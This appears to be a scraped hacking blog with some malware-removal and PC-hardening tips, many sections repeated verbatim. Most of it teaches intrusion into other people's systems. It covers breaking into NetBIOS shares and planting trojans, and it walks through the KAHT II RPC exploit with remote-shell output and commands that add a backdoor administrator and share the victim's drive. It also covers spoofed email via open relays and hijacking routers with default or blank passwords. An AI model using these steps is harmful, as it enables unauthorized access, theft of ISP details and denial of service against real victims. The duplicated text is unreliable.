Flash_Disinfector
Please download Flash_Disinfector.exe ( http://www.techsupportforum.com/sectools/sUBs/Flash_Disinfector.exe )by sUBs and save it to your desktop:
Note: Please delete any existing copy of Flash Disinfector(if any) on your pc and download this one.
* Double-click Flash_Disinfector.exe to run it.
* Follow any prompts that may appear.
* Your desktop will vanish for a while, and then reappear. This is normal.
* Wait until the program has finished scanning, then please exit the program.
* Restart your computer and see if problem still persists.
Monday, February 4, 2008
Securing your Windows PC
Firstly install Win XP with the latest Service pack. Run Windows update (START, ALL PROGRAMS, WINDOWS UPDATE) and update Windows and all your device drivers. Go download all the latest versions of applications you use like FTP server or proxy or so, old versions of programs is insecure and you could be hacked that way..
Disable the "guest" account on your PC and rename your "administrator" account. Right click My Computer and choose Manage.
Stop any services you don't use, but be careful not to stop something that u use ( RIGHT CLICK MY COMPUTER, CHOOSE MANAGE, SERVICES AND APPLICATIONS, SERVICES). Stop the MESSENGER and REMOTE REGISTERY services.
Delete the admin shares, share it as something else and then stop sharing it. Then when you reboot it will not share it automatically again. With these admin shares domain admin's and hackers can access your PC. Make sure to put a complex password on all your accounts.
Make your hard drive NTFS - it is the file system you format your harddrive with. Put a password on your BIOS and make sure you change the boot order to boot first with the hard drive, so someone cannot boot up with a CD, delete your SAM file, or crack its password and gain administrator access to your PC..
Make sure the built in firewall is enabled. Check in control panel for Windows firewall. This firewall may be the cause that some of your hacking applications and tools will stop working, so if you have a problem with an application make sure to add this program to your windows firewall exceptions.
Install some kind of anti virus program, Norton Anti Virus works good, but remember that alot of hacking tools are picked up by Anti Virus, so disable your Anti Virus before running those tools.
Also install a Spyware removal tools like Spyware Doctor
Spyware is iritating software which is installed onto your PC through files you download from the net or webpages you open which has mallicious code in it. It slows down your PC and might send your information to the spyware creator.
Disable the "guest" account on your PC and rename your "administrator" account. Right click My Computer and choose Manage.
Stop any services you don't use, but be careful not to stop something that u use ( RIGHT CLICK MY COMPUTER, CHOOSE MANAGE, SERVICES AND APPLICATIONS, SERVICES). Stop the MESSENGER and REMOTE REGISTERY services.
Delete the admin shares, share it as something else and then stop sharing it. Then when you reboot it will not share it automatically again. With these admin shares domain admin's and hackers can access your PC. Make sure to put a complex password on all your accounts.
Make your hard drive NTFS - it is the file system you format your harddrive with. Put a password on your BIOS and make sure you change the boot order to boot first with the hard drive, so someone cannot boot up with a CD, delete your SAM file, or crack its password and gain administrator access to your PC..
Make sure the built in firewall is enabled. Check in control panel for Windows firewall. This firewall may be the cause that some of your hacking applications and tools will stop working, so if you have a problem with an application make sure to add this program to your windows firewall exceptions.
Install some kind of anti virus program, Norton Anti Virus works good, but remember that alot of hacking tools are picked up by Anti Virus, so disable your Anti Virus before running those tools.
Also install a Spyware removal tools like Spyware Doctor
Spyware is iritating software which is installed onto your PC through files you download from the net or webpages you open which has mallicious code in it. It slows down your PC and might send your information to the spyware creator.
Hacking a PC through NetBios shares
Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printing enabled, so mostly computers with an network card. If you find a computer with a share, use Windows to connect to that share. Go START, RUN and type in "\\IP\sharename". Example "\\198.55.67.244\c" or with the PC name "\\pc1\c" - then you will have access to the share, to delete, copy or rename files or directories, depending what it was shared as, but most people share things with full access and no password. If you find a PC with shares, but when you try and connect to it, it ask you a password, the easy way to crack it is with PQWak, this program brute force cracks the password for you - Win9X only.
Windows NT/XP, works through permissions, so if something is shared, it is shared with permissions to the folder, and permissions is given to an user name. But alot of people make shares with full access to anyone. Win2K/XP accessing an share like the C$ share will ask you an username and password, if there is no password specified by the person who's PC it is.. Trying username as Administrator and password blank. Most people got administrator account password blank, easy way to get onto their shares.
Windows 2000 and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.
If you gain access to someone's hard drive, copy a trojan server file into their startup folder, and then when they reboot their PC, the trojan will run and you will have access to their PC with the trojan.
Windows NT/XP, works through permissions, so if something is shared, it is shared with permissions to the folder, and permissions is given to an user name. But alot of people make shares with full access to anyone. Win2K/XP accessing an share like the C$ share will ask you an username and password, if there is no password specified by the person who's PC it is.. Trying username as Administrator and password blank. Most people got administrator account password blank, easy way to get onto their shares.
Windows 2000 and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.
If you gain access to someone's hard drive, copy a trojan server file into their startup folder, and then when they reboot their PC, the trojan will run and you will have access to their PC with the trojan.
Hacking a PC with a exploit
What is a exploit? It's a poorly coded piece in software which you can use to gain access to the system. There is many exploits available for the various MS Windows's out there. Check this page for new exploits : http://www.frsirt.com/exploits/ or check the Windows Hacker exploit download page which has compiled exploits.
Now if your a n00b, you don't know how to compile an exploit, basically you need some programming experience, so go learn how to program. Most exploits are written in C++ so try Bloodshed Dev C++ which you can use to compile exploits.
Read this tutorial about compiling exploits.
But you can download exploits which other people has already compiled. If someone updates their PC when new exploits comes out, you can't exploit them. but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.
Check this example of how a exploit works:
KAHT II - MASSIVE RPC EXPLOIT
This is a exploit for Win2k/XP and its already compiled, you can download it from the Windows Hacker exploits section.
This is an explanation of how to use it :
1. Get target IP, make sure it uses XP or 2k
2. Download exploit tool
(make sure to deactivate your AV)
3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101
note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1
4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------
Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...
Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
5. NOW.. YOU ARE IN TARGET DRIVE
6. Then you may add user
C:\WINNT\system32>net user myuser mypassword /add
^ ^
user name password
7. Group to admin
C:\WINNT\system32>net localgroup Administrators myuser /add
^ ^ ^
target group group user
8. Sharing drive
C:\WINNT\system32>net share c=c:
9. Exit from target.. dont forget!
C:\WINNT\system32>exit
10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here
There you will now have a mapped drive to the target PC and an administrator account.
Now if your a n00b, you don't know how to compile an exploit, basically you need some programming experience, so go learn how to program. Most exploits are written in C++ so try Bloodshed Dev C++ which you can use to compile exploits.
Read this tutorial about compiling exploits.
But you can download exploits which other people has already compiled. If someone updates their PC when new exploits comes out, you can't exploit them. but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.
Check this example of how a exploit works:
KAHT II - MASSIVE RPC EXPLOIT
This is a exploit for Win2k/XP and its already compiled, you can download it from the Windows Hacker exploits section.
This is an explanation of how to use it :
1. Get target IP, make sure it uses XP or 2k
2. Download exploit tool
(make sure to deactivate your AV)
3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101
note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1
4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------
Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...
Microsoft Windows 2000 [VErsion 5.00.2195]
C:\WINNT\system32>
5. NOW.. YOU ARE IN TARGET DRIVE
6. Then you may add user
C:\WINNT\system32>net user myuser mypassword /add
^ ^
user name password
7. Group to admin
C:\WINNT\system32>net localgroup Administrators myuser /add
^ ^ ^
target group group user
8. Sharing drive
C:\WINNT\system32>net share c=c:
9. Exit from target.. dont forget!
C:\WINNT\system32>exit
10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here
There you will now have a mapped drive to the target PC and an administrator account.
Anonymus email/email any address
Download RA-Anonymous email first. Then choose who u want to send to and from who u want the email to be from. For this to work you will have to find an smtp server that accepts relaying. . So in the server space put in : "smtp.mweb.co.za" - this smtp worked at the time I tested it.. and your are ready to send someone email from billgates@microsoft.com !! Use OPENRELAYCHECKER from my downloads page to download OPENRELAYCHECKER which you can use to search for email servers that support relaying. If your lazy goto this webpage where you can send anonymous emails :http://www.elitec0ders.net/afteranonimousmail.htm
Accesing Routers
Routers are devices which is used to route data on a network, it decides where certain traffic should be sent to. Routers acts as a gateway to the Internet and is use by most people these days to access the Internet instead of Modems. A client PC could either be connected to the Router through a LAN cable of with a Wireless card. Routers are mostly configured though a web based system or with a command prompt window (cmd).
Most home users with ADSL use Routers as their gateway to the Internet.
Some Routers are configured so that it can only be administered though the Web based system when your are connected to the Routers local network - the internal LAN.Connecting to the Router you will use your web browser. A typical router IP address would be 192.168.0.1. So this would be the address to use to connect to the Router though a browser: You are not allowed to view links.
Register or Login
If you are using a Router as your Internet gateway try connecting to it. Remember the routers IP address could differ from the example above. If you don't know your Routers IP address goto command prompt and type in: ipconfig
Your local area connection gateway address will be your Routers IP address. Remember the Router is your gateway to the Internet.
When you are connected to your Router though the web based system it will ask you a username and password. If you know the login details use it to log into the Router. If you do not know the login details you can try the default login details as set by the Router manufacturer. Have a look at this list with default login details.
In your Routers configuration you can set settings which the Router uses the connect to the Internet, security settings, local LAN configurations, DHCP settings, port forwarding, statistics and information about the Router status and many more.
Accesing a Router though a command prompt windows can be achived by going to command prompt (cmd) and typing in:
telnet 192.168.0.1 23
23 is the port which the Router will be access with.
You can access someone else's Router over the Internet, login and change settings or even steal their ISP ( internet service provider ) details. When you Telnet to a Router and it brings up the login screen it sometimes will show you what make and model the Router is. Then check the default password list and see if you can login with those default login details and obtain access to the Router. If the person who's Router it is has not changed the Router's default login details you should be able to access the Router easily. Most home users do not change the default passwords. When you access someone else's Router over the Internet, you can change settings, forward ports, reset the Router or even steal their ISP ( internet service provider ) details.
Telnetting to a Marconi ADSL Router with the CX82310 chip from Conexant on port 23 will give the following output:
01/01/99 CONEXANT SYSTEMS, INC.=20 00:04:10 ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21 = =20 =20
LOGIN PASSWORD>
And logging into the Router will bring up the main menu:
01/04/99 CONEXANT SYSTEMS, INC. 02:00:45
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.29
MAIN MENU
1. SYSTEM STATUS AND CONFIGURATION
2. ADSL MENU
4. REMOTE LOGON
Q. LOGOUT
ENTER CHOICE-->
This specific Marconi Router has a vulnerability which if you Telnet to the Router on port 254 ( as shown above ) and the enter key is pressed ( blank login password ) you will gain access to the Router. In this menu you will be able to remotely reset to factory settings, allowing a permanent denial of service attack until reconfigured manually.
Another vulnerability of this Marconi Router is that when you connect to the Router with the web based GUI ( graphical user inteface ) you will be able to see the ISP password when viewing the webpage source. You are not allowed to view links.
Register or Login /System.sht
Most home users with ADSL use Routers as their gateway to the Internet.
Some Routers are configured so that it can only be administered though the Web based system when your are connected to the Routers local network - the internal LAN.Connecting to the Router you will use your web browser. A typical router IP address would be 192.168.0.1. So this would be the address to use to connect to the Router though a browser: You are not allowed to view links.
Register or Login
If you are using a Router as your Internet gateway try connecting to it. Remember the routers IP address could differ from the example above. If you don't know your Routers IP address goto command prompt and type in: ipconfig
Your local area connection gateway address will be your Routers IP address. Remember the Router is your gateway to the Internet.
When you are connected to your Router though the web based system it will ask you a username and password. If you know the login details use it to log into the Router. If you do not know the login details you can try the default login details as set by the Router manufacturer. Have a look at this list with default login details.
In your Routers configuration you can set settings which the Router uses the connect to the Internet, security settings, local LAN configurations, DHCP settings, port forwarding, statistics and information about the Router status and many more.
Accesing a Router though a command prompt windows can be achived by going to command prompt (cmd) and typing in:
telnet 192.168.0.1 23
23 is the port which the Router will be access with.
You can access someone else's Router over the Internet, login and change settings or even steal their ISP ( internet service provider ) details. When you Telnet to a Router and it brings up the login screen it sometimes will show you what make and model the Router is. Then check the default password list and see if you can login with those default login details and obtain access to the Router. If the person who's Router it is has not changed the Router's default login details you should be able to access the Router easily. Most home users do not change the default passwords. When you access someone else's Router over the Internet, you can change settings, forward ports, reset the Router or even steal their ISP ( internet service provider ) details.
Telnetting to a Marconi ADSL Router with the CX82310 chip from Conexant on port 23 will give the following output:
01/01/99 CONEXANT SYSTEMS, INC.=20 00:04:10 ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21 = =20 =20
LOGIN PASSWORD>
And logging into the Router will bring up the main menu:
01/04/99 CONEXANT SYSTEMS, INC. 02:00:45
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.29
MAIN MENU
1. SYSTEM STATUS AND CONFIGURATION
2. ADSL MENU
4. REMOTE LOGON
Q. LOGOUT
ENTER CHOICE-->
This specific Marconi Router has a vulnerability which if you Telnet to the Router on port 254 ( as shown above ) and the enter key is pressed ( blank login password ) you will gain access to the Router. In this menu you will be able to remotely reset to factory settings, allowing a permanent denial of service attack until reconfigured manually.
Another vulnerability of this Marconi Router is that when you connect to the Router with the web based GUI ( graphical user inteface ) you will be able to see the ISP password when viewing the webpage source. You are not allowed to view links.
Register or Login /System.sht
autorun.inf virus removal
Removing the ntde1ect.com and autorun.inf files
September 10th, 2007 at 6:01 am (Tips, Windows)
There is a trojan/virus (either the Win32/Pacex virus or the Win32/PSW.Agent.NDP trojan) that uses those two files. Here is how you can get rid of them:
1) Open up Task Manager (Ctrl-Alt-Del)
2) If wscript.exe is running, end it.
3) If explorer.exe is running, end it.
4) Open up “File | New Task (Run)” in the Task manager
5) Run cmd
6) Run the following command on all your drives by replacing c:\ with other drives in turn (note: if you have autorun.inf files that you think you need to backup, do so now):
del c:\autorun.* /f /a /s /q
7) Go to your Windows\System32 directory by typing cd c:\windows\system32
Type dir /a avp*.*
9) If you see any files names avp0.dll or avpo.exe or avp0.exe, use the following commands to delete each of them:
attrib -r -s -h avpo.exe
del avpo.exe
10) Use the Task Manager’s Run command to fire up regedit
11) Navigate to HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run (as usual, take a backup of your registry before touching it!)
12) If there are any entries for avpo.exe, delete them.
13) Do a complete search of your registry for ntde1ect.com and delete any entries you find.
14) Restart your computer.
September 10th, 2007 at 6:01 am (Tips, Windows)
There is a trojan/virus (either the Win32/Pacex virus or the Win32/PSW.Agent.NDP trojan) that uses those two files. Here is how you can get rid of them:
1) Open up Task Manager (Ctrl-Alt-Del)
2) If wscript.exe is running, end it.
3) If explorer.exe is running, end it.
4) Open up “File | New Task (Run)” in the Task manager
5) Run cmd
6) Run the following command on all your drives by replacing c:\ with other drives in turn (note: if you have autorun.inf files that you think you need to backup, do so now):
del c:\autorun.* /f /a /s /q
7) Go to your Windows\System32 directory by typing cd c:\windows\system32
Type dir /a avp*.*
9) If you see any files names avp0.dll or avpo.exe or avp0.exe, use the following commands to delete each of them:
attrib -r -s -h avpo.exe
del avpo.exe
10) Use the Task Manager’s Run command to fire up regedit
11) Navigate to HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run (as usual, take a backup of your registry before touching it!)
12) If there are any entries for avpo.exe, delete them.
13) Do a complete search of your registry for ntde1ect.com and delete any entries you find.
14) Restart your computer.
Subscribe to:
Posts (Atom)